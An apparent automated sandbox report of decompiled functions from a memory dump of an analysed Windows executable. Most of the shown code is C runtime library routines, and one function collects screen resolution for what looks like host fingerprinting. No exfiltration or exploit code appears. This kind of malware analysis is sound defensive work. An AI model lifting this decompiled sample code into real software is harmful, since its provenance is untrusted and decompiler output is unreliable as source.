0x00425df0
0x00425df3
0x00425df6
0x00425df7
0x00425dfa
0x00425e04
0x00425e08
0x00000000
0x00425e08
0x00425e0e

APIs

___BuildCatchObject.LIBCMT ref: 00425DB4

Part of subcall function 00425D0F: ___BuildCatchObjectHelper.LIBCMT ref: 00425D45

_UnwindNestedFrames.LIBCMT ref: 00425DCB
___FrameUnwindToState.LIBCMT ref: 00425DD9

Strings

csm, xrefs: 00425DB0, 00425DC5, 00425DD8, 00425DF6, 00425E06
csm, xrefs: 00425DA3

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
String ID: csm$csm
API String ID: 2163707966-3733052814
Opcode ID: 50106dbe3085d0e97134de8a49b133a93f62fdee1138184848a79e6080759471
Instruction ID: f333cc1b613ff98a627f89863f56b649b3c859ed8e15c440b03227754eabcb04
Opcode Fuzzy Hash: 50106dbe3085d0e97134de8a49b133a93f62fdee1138184848a79e6080759471
Instruction Fuzzy Hash: 34012871100929BBDF126F51EC45EAB3F6AEF04354F90801ABD0814161D73A99B1DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004061D1, Relevance: 7.7, APIs: 5, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E004061D1(char* _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20) {
				signed int _v8;
				char* _v12;
				signed int _v16;
				signed int _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				char _t89;
				signed int _t96;
				void* _t97;
				signed int _t98;
				signed int _t101;
				signed int _t104;
				signed int _t108;
				signed int _t109;
				char* _t110;
				signed int _t119;
				signed int _t122;
				signed int _t123;
				signed int _t124;
				signed int _t125;
				void* _t126;

				_t110 = _a4;
				_t108 = _a8;
				_t122 = _a12;
				_v12 = _t110;
				_v8 = _t108;
				if(_t122 == 0 || _a16 == 0) {
					L5:
					return 0;
				} else {
					_t130 = _t110;
					if(_t110 != 0) {
						_t125 = _a20;
						__eflags = _t125;
						if(_t125 == 0) {
							L9:
							__eflags = _t108 - 0xffffffff;
							if(_t108 != 0xffffffff) {
								_t82 = E004091C0(_t110, 0, _t108);
								_t126 = _t126 + 0xc;
							}
							__eflags = _t125;
							if(__eflags == 0) {
								goto L3;
							} else {
								__eflags = _a16 - (_t82 | 0xffffffff) / _t122;
								if(__eflags > 0) {
									goto L3;
								}
								L13:
								_t123 = _t122 * _a16;
								__eflags =  *(_t125 + 0xc) & 0x0000010c;
								_v20 = _t123;
								_t109 = _t123;
								if(( *(_t125 + 0xc) & 0x0000010c) == 0) {
									_v16 = 0x1000;
								} else {
									_v16 =  *((intOrPtr*)(_t125 + 0x18));
								}
								__eflags = _t123;
								if(_t123 == 0) {
									L40:
									return _a16;
								} else {
									do {
										__eflags =  *(_t125 + 0xc) & 0x0000010c;
										if(( *(_t125 + 0xc) & 0x0000010c) == 0) {
											L24:
											__eflags = _t109 - _v16;
											if(_t109 < _v16) {
												_t89 = E0040C6BF(_t109, _t123, _t125);
												__eflags = _t89 - 0xffffffff;
												if(_t89 == 0xffffffff) {
													L45:
													return (_t123 - _t109) / _a12;
												}
												__eflags = _v8;
												if(_v8 == 0) {
													L41:
													__eflags = _a8 - 0xffffffff;
													if(__eflags != 0) {
														E004091C0(_a4, 0, _a8);
													}
													 *((intOrPtr*)(E00405A49(__eflags))) = 0x22;
													L4:
													E00407461();
													goto L5;
												}
												_t112 = _v12;
												_v12 = _v12 + 1;
												 *_v12 = _t89;
												_t109 = _t109 - 1;
												_t65 =  &_v8;
												 *_t65 = _v8 - 1;
												__eflags =  *_t65;
												_v16 =  *((intOrPtr*)(_t125 + 0x18));
												goto L39;
											}
											__eflags = _v16;
											if(_v16 == 0) {
												_t96 = 0x7fffffff;
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t96 = _t109;
												}
											} else {
												__eflags = _t109 - 0x7fffffff;
												if(_t109 <= 0x7fffffff) {
													_t50 = _t109 % _v16;
													__eflags = _t50;
													_t119 = _t50;
													_t101 = _t109;
												} else {
													_t119 = 0x7fffffff % _v16;
													_t101 = 0x7fffffff;
												}
												_t96 = _t101 - _t119;
											}
											__eflags = _t96 - _v8;
											if(_t96 > _v8) {
												goto L41;
											} else {
												_push(_t96);
												_push(_v12);
												_t97 = E0040AE85(_t125);
												_pop(_t112);
												_push(_t97);
												_t98 = E0040CD98(_t109, _t123, _t125, __eflags);
												_t126 = _t126 + 0xc;
												__eflags = _t98;
												if(_t98 == 0) {
													 *(_t125 + 0xc) =  *(_t125 + 0xc) | 0x00000010;
													goto L45;
												}
												__eflags = _t98 - 0xffffffff;
												if(_t98 == 0xffffffff) {
													L44:
													_t72 = _t125 + 0xc;
													 *_t72 =  *(_t125 + 0xc) | 0x00000020;
													__eflags =  *_t72;
													goto L45;
												}
												_v12 = _v12 + _t98;
												_t109 = _t109 - _t98;
												_v8 = _v8 - _t98;
												goto L39;
											}
										}
										_t104 =  *(_t125 + 4);
										__eflags = _t104;
										if(__eflags == 0) {
											goto L24;
										}
										if(__eflags < 0) {
											goto L44;
										}
										_t124 = _t109;
										__eflags = _t109 - _t104;
										if(_t109 >= _t104) {
											_t124 = _t104;
										}
										__eflags = _t124 - _v8;
										if(_t124 > _v8) {
											goto L41;
										} else {
											E0040518C(_t112, _v12, _v8,  *_t125, _t124);
											 *(_t125 + 4) =  *(_t125 + 4) - _t124;
											 *_t125 =  *_t125 + _t124;
											_v12 = _v12 + _t124;
											_t109 = _t109 - _t124;
											_t126 = _t126 + 0x10;
											_v8 = _v8 - _t124;
											_t123 = _v20;
										}
										L39:
										__eflags = _t109;
									} while (_t109 != 0);
									goto L40;
								}
							}
						}
						_t82 = (_t82 | 0xffffffff) / _t122;
						__eflags = _a16 - _t82;
						if(_a16 <= _t82) {
							goto L13;
						}
						goto L9;
					}
					L3:
					 *((intOrPtr*)(E00405A49(_t130))) = 0x16;
					goto L4;
				}
			}

0x004061d9
0x004061dd
0x004061e2
0x004061e5
0x004061e8
0x004061ed
0x00406209
0x00000000
0x004061f5
0x004061f5
0x004061f7
0x00406210
0x00406213
0x00406215
0x00406223
0x00406223
0x00406226
0x0040622c
0x00406231
0x00406231
0x00406234
0x00406236
0x00000000
0x00406238
0x0040623f
0x00406242
0x00000000
0x00000000
0x00406244
0x00406244
0x00406248
0x0040624f
0x00406252
0x00406254
0x0040625e
0x00406256
0x00406259
0x00406259
0x00406265
0x00406267
0x00406347
0x00000000
0x0040626d
0x0040626d
0x0040626d
0x00406274
0x004062ba
0x004062ba
0x004062bd
0x0040631c
0x00406322
0x00406325
0x00406379
0x00000000
0x0040637f
0x00406327
0x0040632b
0x0040634f
0x0040634f
0x00406353
0x0040635d
0x00406362
0x0040636a
0x00406204
0x00406204
0x00000000
0x00406204
0x0040632d
0x00406330
0x00406333
0x00406338
0x00406339
0x00406339
0x00406339
0x0040633c
0x00000000
0x0040633c
0x004062bf
0x004062c3
0x004062e4
0x004062e9
0x004062eb
0x004062ed
0x004062ed
0x004062c5
0x004062cc
0x004062ce
0x004062db
0x004062db
0x004062db
0x004062de
0x004062d0
0x004062d2
0x004062d5
0x004062d5
0x004062e0
0x004062e0
0x004062ef
0x004062f2
0x00000000
0x004062f4
0x004062f4
0x004062f5
0x004062f9
0x004062fe
0x004062ff
0x00406300
0x00406305
0x00406308
0x0040630a
0x00406387
0x00000000
0x00406387
0x0040630c
0x0040630f
0x00406375
0x00406375
0x00406375
0x00406375
0x00000000
0x00406375
0x00406311
0x00406314
0x00406316
0x00000000
0x00406316
0x004062f2
0x00406276
0x00406279
0x0040627b
0x00000000
0x00000000
0x0040627d
0x00000000
0x00000000
0x00406283
0x00406285
0x00406287
0x00406289
0x00406289
0x0040628b
0x0040628e
0x00000000
0x00406294
0x0040629d
0x004062a2
0x004062a5
0x004062a7
0x004062aa
0x004062ac
0x004062af
0x004062b2
0x004062b2
0x0040633f
0x0040633f
0x0040633f
0x00000000
0x0040626d
0x00406267
0x00406236
0x0040621c
0x0040621e
0x00406221
0x00000000
0x00000000
0x00000000
0x00406221
0x004061f9
0x004061fe
0x00000000
0x004061fe

APIs

_memset.LIBCMT ref: 0040622C
_memcpy_s.LIBCMT ref: 0040629D
__read.LIBCMT ref: 00406300
__filbuf.LIBCMT ref: 0040631C

Part of subcall function 00405A49: __getptd_noexit.LIBCMT ref: 00405A49

_memset.LIBCMT ref: 0040635D

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: _memset$__filbuf__getptd_noexit__read_memcpy_s
String ID:
API String ID: 4048096073-0
Opcode ID: 0cf97bb49f6c97081f8a1c80fee2c433a59ae391689aac8020b9d3edf1ee0f1c
Instruction ID: 40ac34ee9ba8a548f40a2df405a56ce8ab59ab566faee64280c6a9bcd3e2d158
Opcode Fuzzy Hash: 0cf97bb49f6c97081f8a1c80fee2c433a59ae391689aac8020b9d3edf1ee0f1c
Instruction Fuzzy Hash: 8051C930A00205DBDB24AFA9884469FB7B1EF40324F15467FEC26762D1D7389D61DF99

Uniqueness

Uniqueness Score: -1.00%

Function 0040F522, Relevance: 7.6, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E0040F522(void* __edx, void* __edi, void* __esi, void* _a4, long _a8) {
				void* _t7;
				long _t8;
				intOrPtr* _t9;
				intOrPtr* _t12;
				long _t27;
				long _t30;

				if(_a4 != 0) {
					_push(__esi);
					_t30 = _a8;
					__eflags = _t30;
					if(_t30 != 0) {
						_push(__edi);
						while(1) {
							__eflags = _t30 - 0xffffffe0;
							if(_t30 > 0xffffffe0) {
								break;
							}
							__eflags = _t30;
							if(_t30 == 0) {
								_t30 = _t30 + 1;
								__eflags = _t30;
							}
							_t7 = HeapReAlloc( *0x43149c, 0, _a4, _t30);
							_t27 = _t7;
							__eflags = _t27;
							if(_t27 != 0) {
								L17:
								_t8 = _t27;
							} else {
								__eflags =  *0x431ac8 - _t7;
								if(__eflags == 0) {
									_t9 = E00405A49(__eflags);
									 *_t9 = E00405A07(GetLastError());
									goto L17;
								} else {
									__eflags = E00408F17(_t7, _t30);
									if(__eflags == 0) {
										_t12 = E00405A49(__eflags);
										 *_t12 = E00405A07(GetLastError());
										L12:
										_t8 = 0;
										__eflags = 0;
									} else {
										continue;
									}
								}
							}
							goto L14;
						}
						E00408F17(_t6, _t30);
						 *((intOrPtr*)(E00405A49(__eflags))) = 0xc;
						goto L12;
					} else {
						E00405341(_a4);
						_t8 = 0;
					}
					L14:
					return _t8;
				} else {
					return E0040537B(__edx, __edi, __esi, _a8);
				}
			}

0x0040f52b
0x0040f538
0x0040f539
0x0040f53c
0x0040f53e
0x0040f54d
0x0040f580
0x0040f580
0x0040f583
0x00000000
0x00000000
0x0040f550
0x0040f552
0x0040f554
0x0040f554
0x0040f554
0x0040f561
0x0040f567
0x0040f569
0x0040f56b
0x0040f5cb
0x0040f5cb
0x0040f56d
0x0040f56d
0x0040f573
0x0040f5b5
0x0040f5c9
0x00000000
0x0040f575
0x0040f57c
0x0040f57e
0x0040f59d
0x0040f5b1
0x0040f597
0x0040f597
0x0040f597
0x00000000
0x00000000
0x00000000
0x0040f57e
0x0040f573
0x00000000
0x0040f599
0x0040f586
0x0040f591
0x00000000
0x0040f540
0x0040f543
0x0040f549
0x0040f549
0x0040f59a
0x0040f59c
0x0040f52d
0x0040f537
0x0040f537

APIs

_malloc.LIBCMT ref: 0040F530

Part of subcall function 0040537B: __FF_MSGBANNER.LIBCMT ref: 00405394
Part of subcall function 0040537B: __NMSG_WRITE.LIBCMT ref: 0040539B
Part of subcall function 0040537B: RtlAllocateHeap.NTDLL(00000000,00000001,?,00000001,?,?,004046A4,00000001,00000000,?,?,?,00404702,?), ref: 004053C0

_free.LIBCMT ref: 0040F543

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: AllocateHeap_free_malloc
String ID:
API String ID: 1020059152-0
Opcode ID: 78a0b71d87b9157f729955b6eb00b17edf7ed4b9ebaf12339a77c87a94f928f1
Instruction ID: e639ce4e8cc3b034b6be9655353c02bb3c552d4dafcb81851dfe93b90508b3b7
Opcode Fuzzy Hash: 78a0b71d87b9157f729955b6eb00b17edf7ed4b9ebaf12339a77c87a94f928f1
Instruction Fuzzy Hash: 1B11B632508611BACB352FB6AC0565B3694DB843A4B20053BF848B6AD2EA3C98454E5C

Uniqueness

Uniqueness Score: -1.00%

Function 0041AF50, Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0041AF50() {
				int _v8;
				int _v16;
				struct HDC__* _v20;
				signed int _v24;
				char _v292;
				signed int _t13;
				CHAR* _t15;
				CHAR* _t21;
				intOrPtr _t25;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t13 =  *0x4301f4; // 0x3b2bc12f
				_v24 = _t13 ^ _t35;
				_t15 =  *0x4320ec; // 0xc167f8
				_v20 = CreateDCA(_t15, 0, 0, 0);
				_v8 = GetDeviceCaps(_v20, 8);
				_v16 = GetDeviceCaps(_v20, 0xa);
				ReleaseDC(0, _v20);
				_t21 =  *0x4322a0; // 0xc17288
				wsprintfA( &_v292, _t21, _v8, _v16);
				return E00404354( &_v292, _t25, _v24 ^ _t35, _v8, _t33, _t34);
			}

0x0041af59
0x0041af60
0x0041af69
0x0041af75
0x0041af84
0x0041af93
0x0041af9c
0x0041afaa
0x0041afb7
0x0041afd3

APIs

CreateDCA.GDI32(00C167F8,00000000,00000000,00000000), ref: 0041AF6F
GetDeviceCaps.GDI32(?,00000008), ref: 0041AF7E
GetDeviceCaps.GDI32(?,0000000A), ref: 0041AF8D
ReleaseDC.USER32(00000000,?), ref: 0041AF9C
wsprintfA.USER32 ref: 0041AFB7

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CapsDevice$CreateReleasewsprintf
String ID:
API String ID: 1281593598-0
Opcode ID: 371d4faec7933df576802d169817c8fea66655d0a078c60c3cc852af34df5aeb
Instruction ID: aa42d19908ffc11280b7e58a0d9ced6239d9bca7c8999a553ca28c3925dcd464
Opcode Fuzzy Hash: 371d4faec7933df576802d169817c8fea66655d0a078c60c3cc852af34df5aeb
Instruction Fuzzy Hash: 44010075A00208AFDB04EFA4ED45FBEB7B8FB48700F005669FA15A7290DA716A44CB65

Uniqueness

Uniqueness Score: -1.00%

Function 00408222, Relevance: 7.5, APIs: 5, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00408222(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t12;
				void* _t28;
				intOrPtr _t29;
				void* _t30;
				void* _t31;

				_t31 = __eflags;
				_t26 = __edi;
				_t25 = __edx;
				_t20 = __ebx;
				_push(0xc);
				_push(0x42de10);
				E00408C20(__ebx, __edi, __esi);
				_t28 = E0040844B(__edx, __edi, _t31);
				_t12 =  *0x430720; // 0xfffffffe
				if(( *(_t28 + 0x70) & _t12) == 0) {
					L6:
					E0040B23F(0xc);
					 *(_t30 - 4) =  *(_t30 - 4) & 0x00000000;
					_t29 = _t28 + 0x6c;
					 *((intOrPtr*)(_t30 - 0x1c)) = E004081D5(_t29,  *0x430968);
					 *(_t30 - 4) = 0xfffffffe;
					E0040828F();
				} else {
					_t33 =  *((intOrPtr*)(_t28 + 0x6c));
					if( *((intOrPtr*)(_t28 + 0x6c)) == 0) {
						goto L6;
					} else {
						_t29 =  *((intOrPtr*)(E0040844B(__edx, _t26, _t33) + 0x6c));
					}
				}
				_t34 = _t29;
				if(_t29 == 0) {
					E00408BF8(_t20, _t25, _t26, _t29, _t34, 0x20);
				}
				return E00408C65(_t29);
			}

0x00408222
0x00408222
0x00408222
0x00408222
0x00408222
0x00408224
0x00408229
0x00408233
0x00408235
0x0040823d
0x00408261
0x00408263
0x00408269
0x00408273
0x0040827e
0x00408281
0x00408288
0x0040823f
0x0040823f
0x00408243
0x00000000
0x00408245
0x0040824a
0x0040824a
0x00408243
0x0040824d
0x0040824f
0x00408253
0x00408258
0x00408260

APIs

__getptd.LIBCMT ref: 0040822E

Part of subcall function 0040844B: __getptd_noexit.LIBCMT ref: 0040844E
Part of subcall function 0040844B: __amsg_exit.LIBCMT ref: 0040845B

__getptd.LIBCMT ref: 00408245
__amsg_exit.LIBCMT ref: 00408253
__lock.LIBCMT ref: 00408263
__updatetlocinfoEx_nolock.LIBCMT ref: 00408277

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: c1afe40b3333c14941596a3315f65fffdf944bee7a376ba849ebee861053df93
Instruction ID: 46835279915a6046533576c3d8cbd4d1c3ced8590ae02f93d8f6aa4b6b75c0f1
Opcode Fuzzy Hash: c1afe40b3333c14941596a3315f65fffdf944bee7a376ba849ebee861053df93
Instruction Fuzzy Hash: 78F06231945B149BEA21BB75560674A37A0AF00728F1001BFF481772C2CF3C58518A5E

Uniqueness

Uniqueness Score: -1.00%

Function 00403240, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00403240(char __ecx, char _a4) {
				signed int _v8;
				char _v12;
				void* _t49;
				void* _t55;
				intOrPtr _t59;
				void* _t61;
				intOrPtr _t64;
				void* _t70;
				intOrPtr _t74;
				intOrPtr _t100;
				intOrPtr _t103;

				_v12 = __ecx;
				_t2 =  &_a4; // 0x403053
				_t49 = E00403EE0( *_t2);
				_t3 =  &_v12; // 0x403053
				if((E004030B0( *_t3, _t49) & 0x000000ff) == 0) {
					_t30 =  &_v12; // 0x403053
					_t95 =  *_t30;
					_t31 =  &_v12; // 0x403053
					__eflags =  *((intOrPtr*)( *_t30 + 4)) -  *((intOrPtr*)( *_t31 + 8));
					if(__eflags == 0) {
						_t34 =  &_v12; // 0x403053
						E004030F0( *_t34, _t95, __eflags, 1);
					}
					_t35 =  &_v12; // 0x403053
					_t37 =  &_v12; // 0x403053
					_t39 =  &_v12; // 0x403053
					E004031E0( *((intOrPtr*)( *_t35 + 4)),  *_t39,  *((intOrPtr*)( *_t37 + 4)),  *((intOrPtr*)( *_t35 + 4)));
					_t40 =  &_a4; // 0x403053
					_t55 = E00403EE0( *_t40);
					_t41 =  &_v12; // 0x403053
					_t43 =  &_v12; // 0x403053
					E00403930( *_t43 + 0xc,  *((intOrPtr*)( *_t41 + 4)), _t55);
					_t44 =  &_v12; // 0x403053
					_t100 =  *((intOrPtr*)( *_t44 + 4)) + 0x44;
					__eflags = _t100;
					_t46 =  &_v12; // 0x403053
					_t59 =  *_t46;
					 *((intOrPtr*)(_t59 + 4)) = _t100;
					return _t59;
				}
				_t4 =  &_a4; // 0x403053
				_t61 = E00403EE0( *_t4);
				_t5 =  &_v12; // 0x403053
				asm("cdq");
				_v8 = (_t61 -  *((intOrPtr*)( *_t5))) / 0x44;
				_t11 =  &_v12; // 0x403053
				_t103 =  *_t11;
				_t12 =  &_v12; // 0x403053
				_t64 =  *_t12;
				_t116 =  *((intOrPtr*)(_t103 + 4)) -  *((intOrPtr*)(_t64 + 8));
				if( *((intOrPtr*)(_t103 + 4)) ==  *((intOrPtr*)(_t64 + 8))) {
					_t15 =  &_v12; // 0x403053
					E004030F0( *_t15, _t103, _t116, 1);
				}
				_t16 =  &_v12; // 0x403053
				_t18 =  &_v12; // 0x403053
				_t20 =  &_v12; // 0x403053
				E004031E0( *((intOrPtr*)( *_t16 + 4)),  *_t20,  *((intOrPtr*)( *_t18 + 4)),  *((intOrPtr*)( *_t16 + 4)));
				_t22 =  &_v12; // 0x403053
				_t70 = E00403EE0(_v8 * 0x44 +  *((intOrPtr*)( *_t22)));
				_t23 =  &_v12; // 0x403053
				_t25 =  &_v12; // 0x403053
				E00403930( *_t25 + 0xc,  *((intOrPtr*)( *_t23 + 4)), _t70);
				_t26 =  &_v12; // 0x403053
				_t74 =  *((intOrPtr*)( *_t26 + 4)) + 0x44;
				_t28 =  &_v12; // 0x403053
				 *((intOrPtr*)( *_t28 + 4)) = _t74;
				return _t74;
			}

0x00403246
0x00403249
0x0040324d
0x00403256
0x00403263
0x004032ef
0x004032ef
0x004032f2
0x004032f8
0x004032fb
0x004032ff
0x00403302
0x00403302
0x00403307
0x0040330e
0x00403315
0x00403318
0x0040331d
0x00403321
0x0040332a
0x00403331
0x00403338
0x00403340
0x00403346
0x00403346
0x00403349
0x00403349
0x0040334c
0x00000000
0x0040334c
0x00403269
0x0040326d
0x00403275
0x0040327a
0x00403282
0x00403285
0x00403285
0x00403288
0x00403288
0x0040328e
0x00403291
0x00403295
0x00403298
0x00403298
0x0040329d
0x004032a4
0x004032ab
0x004032ae
0x004032b9
0x004032bf
0x004032c8
0x004032cf
0x004032d6
0x004032de
0x004032e4
0x004032e7
0x004032ea
0x00000000

APIs

construct.LIBCPMTD ref: 004032D6
construct.LIBCPMTD ref: 00403338

Strings

S0@, xrefs: 00403256, 004032EF, 004032F2, 00403307, 0040330E, 00403315, 0040332A, 00403331, 00403340, 00403349, 004032FF, 00403275, 00403285, 00403288, 0040329D, 004032A4, 004032AB, 004032B9, 004032C8, 004032CF, 004032DE, 004032E7, 00403295, 004032D5, 00403337
S0@, xrefs: 00403249, 0040331D, 00403269, 0040324C, 0040326C, 00403320

Memory Dump Source

Source File: 00000005.00000002.388217093.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: construct
String ID: S0@$S0@
API String ID: 1526029037-1005104211
Opcode ID: 2b46c4d5b80c92857b29efff7dfa5c1110fdc9c701c2f427c0e5af701a796781
Instruction ID: dba46e10441b74b44bcdba22c1b1a89158026711fe9c34101d68b7ec43f2729a
Opcode Fuzzy Hash: 2b46c4d5b80c92857b29efff7dfa5c1110fdc9c701c2f427c0e5af701a796781
Instruction Fuzzy Hash: 503143B5A00104AFCB04DF95C891D5EFF7AAF88308F1481A9E509BB392D735EE81CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00406DD7, Relevance: 6.2, APIs: 4, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 97%

			E00406DD7(void* __ebx, void* __edi, signed char* _a4, signed int _a8, intOrPtr _a12) {
				signed int _v7;
				signed int _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				char _v24;
				signed int _t72;
				signed int _t74;
				intOrPtr _t75;
				void* _t77;
				intOrPtr _t79;
				signed short _t82;
				void* _t84;
				signed short _t87;
				intOrPtr _t91;
				signed int _t97;
				signed int _t100;
				void* _t101;
				signed int _t102;
				void* _t103;
				signed int _t104;
				signed char* _t114;
				signed char* _t115;
				signed int _t116;
				signed int _t117;
				signed int _t118;
				signed int _t124;
				signed int _t125;
				void* _t127;

				E00404BBD(__ebx,  &_v24, __edi, _a12);
				_t114 = _a4;
				_t129 = _t114;
				if(_t114 != 0) {
					_push(__ebx);
					_t97 = _a8;
					__eflags = _t97;
					if(__eflags != 0) {
						_t72 = _v20;
						__eflags =  *(_t72 + 8);
						if( *(_t72 + 8) != 0) {
							_push(__edi);
							while(1) {
								_t100 =  *_t114 & 0x000000ff;
								_t124 = _t100 & 0x000000ff;
								_t115 =  &(_t114[1]);
								__eflags =  *(_t124 + _t72 + 0x1d) & 0x00000004;
								_a4 = _t115;
								if(( *(_t124 + _t72 + 0x1d) & 0x00000004) == 0) {
									goto L20;
								}
								__eflags =  *_t115;
								if(__eflags != 0) {
									_t84 = E0040E53F(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t115 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
									_t127 = _t127 + 0x24;
									__eflags = _t84 - 1;
									if(_t84 != 1) {
										__eflags = _t84 - 2;
										if(__eflags != 0) {
											goto L37;
										} else {
											_t87 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
											__eflags = _t87;
											_t125 = _t87 & 0x0000ffff;
											goto L19;
										}
									} else {
										_t125 = _v8 & 0x000000ff;
										L19:
										_a4 =  &(_a4[1]);
										_t72 = _v20;
										goto L23;
									}
								} else {
									_t125 = 0;
									L23:
									_t102 =  *_t97 & 0x000000ff;
									_t117 = _t102 & 0x000000ff;
									_t97 = _t97 + 1;
									__eflags =  *(_t117 + _t72 + 0x1d) & 0x00000004;
									if(( *(_t117 + _t72 + 0x1d) & 0x00000004) == 0) {
										_t118 = _t102;
										_t103 = _t118 + _t72;
										__eflags =  *(_t103 + 0x1d) & 0x00000010;
										if(( *(_t103 + 0x1d) & 0x00000010) == 0) {
											_t104 = _t118;
										} else {
											_t104 =  *(_t103 + 0x11d) & 0x000000ff;
										}
										goto L34;
									} else {
										__eflags =  *_t97;
										if(__eflags != 0) {
											_t77 = E0040E53F(_t97, 0x200, __eflags,  &_v24,  *((intOrPtr*)(_t72 + 0xc)), 0x200, _t97 - 1, 2,  &_v8, 2,  *((intOrPtr*)(_t72 + 4)), 1);
											_t127 = _t127 + 0x24;
											__eflags = _t77 - 1;
											if(_t77 != 1) {
												__eflags = _t77 - 2;
												if(__eflags != 0) {
													L37:
													 *((intOrPtr*)(E00405A49(__eflags))) = 0x16;
													__eflags = _v12;
													if(_v12 != 0) {
														_t79 = _v16;
														_t61 = _t79 + 0x70;
														 *_t61 =  *(_t79 + 0x70) & 0xfffffffd;
														__eflags =  *_t61;
													}
													_t74 = 0x7fffffff;
												} else {
													_t82 = (_v8 & 0x000000ff) * 0x100 + (_v7 & 0x000000ff);
													__eflags = _t82;
													_t104 = _t82 & 0x0000ffff;
													goto L30;
												}
											} else {
												_t104 = _v8 & 0x000000ff;
												L30:
												_t72 = _v20;
												_t97 = _t97 + 1;
												goto L34;
											}
										} else {
											_t104 = 0;
											L34:
											__eflags = _t104 - _t125;
											if(_t104 != _t125) {
												asm("sbb eax, eax");
												_t74 = (_t72 & 0x00000002) - 1;
												__eflags = _v12;
												if(_v12 != 0) {
													 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
												}
											} else {
												__eflags = _t125;
												if(_t125 == 0) {
													__eflags = _v12;
													if(_v12 != 0) {
														_t75 = _v16;
														_t69 = _t75 + 0x70;
														 *_t69 =  *(_t75 + 0x70) & 0xfffffffd;
														__eflags =  *_t69;
													}
													_t74 = 0;
													__eflags = 0;
												} else {
													_t114 = _a4;
													continue;
												}
											}
										}
									}
								}
								goto L46;
								L20:
								_t116 = _t100;
								_t101 = _t116 + _t72;
								__eflags =  *(_t101 + 0x1d) & 0x00000010;
								if(( *(_t101 + 0x1d) & 0x00000010) == 0) {
									_t125 = _t116;
								} else {
									_t125 =  *(_t101 + 0x11d) & 0x000000ff;
								}
								goto L23;
							}
						} else {
							_t74 = E0040523A(_t114, __edi, _t114, _t97,  &_v24);
							__eflags = _v12;
							if(_v12 != 0) {
								 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
							}
						}
					} else {
						 *((intOrPtr*)(E00405A49(__eflags))) = 0x16;
						E00407461();
						__eflags = _v12 - _t97;
						if(_v12 != _t97) {
							_t91 = _v16;
							_t11 = _t91 + 0x70;
							 *_t11 =  *(_t91 + 0x70) & 0xfffffffd;
							__eflags =  *_t11;
						}
						_t74 = 0x7fffffff;
					}
					L46:
					return _t74;
				} else {
					 *((intOrPtr*)(E00405A49(_t129))) = 0x16;
					E00407461();
					if(_v12 != 0) {
						 *(_v16 + 0x70) =  *(_v16 + 0x70) & 0xfffffffd;
					}
					return 0x7fffffff;
				}
			}

0x00406de5
0x00406dea
0x00406ded
0x00406def
0x00406e15
0x00406e16
0x00406e19
0x00406e1b
0x00406e43
0x00406e46
0x00406e4a
0x00406e70
0x00406e77
0x00406e77
0x00406e7a
0x00406e7d
0x00406e7e
0x00406e83
0x00406e86
0x00000000
0x00000000
0x00406e88
0x00406e8b
0x00406ea8
0x00406ead
0x00406eb0
0x00406eb3
0x00406ebb
0x00406ebe
0x00000000
0x00406ec4
0x00406ed5
0x00406ed5
0x00406ed8
0x00000000
0x00406ed8
0x00406eb5
0x00406eb5
0x00406edb
0x00406edb
0x00406ede
0x00000000
0x00406ede
0x00406e8d
0x00406e8d
0x00406ef9
0x00406ef9
0x00406efc
0x00406eff
0x00406f00
0x00406f05
0x00406f5e
0x00406f60
0x00406f63
0x00406f67
0x00406f72
0x00406f69
0x00406f69
0x00406f69
0x00000000
0x00406f07
0x00406f07
0x00406f0a
0x00406f29
0x00406f2e
0x00406f31
0x00406f34
0x00406f3c
0x00406f3f
0x00406f86
0x00406f8b
0x00406f91
0x00406f95
0x00406f97
0x00406f9a
0x00406f9a
0x00406f9a
0x00406f9a
0x00406f9e
0x00406f41
0x00406f52
0x00406f52
0x00406f55
0x00000000
0x00406f55
0x00406f36
0x00406f36
0x00406f58
0x00406f58
0x00406f5b
0x00000000
0x00406f5b
0x00406f0c
0x00406f0c
0x00406f74
0x00406f74
0x00406f77
0x00406fa5
0x00406faa
0x00406fab
0x00406faf
0x00406fb4
0x00406fb4
0x00406f79
0x00406f79
0x00406f7c
0x00406fba
0x00406fbe
0x00406fc0
0x00406fc3
0x00406fc3
0x00406fc3
0x00406fc3
0x00406fc7
0x00406fc7
0x00406f7e
0x00406f7e
0x00000000
0x00406f7e
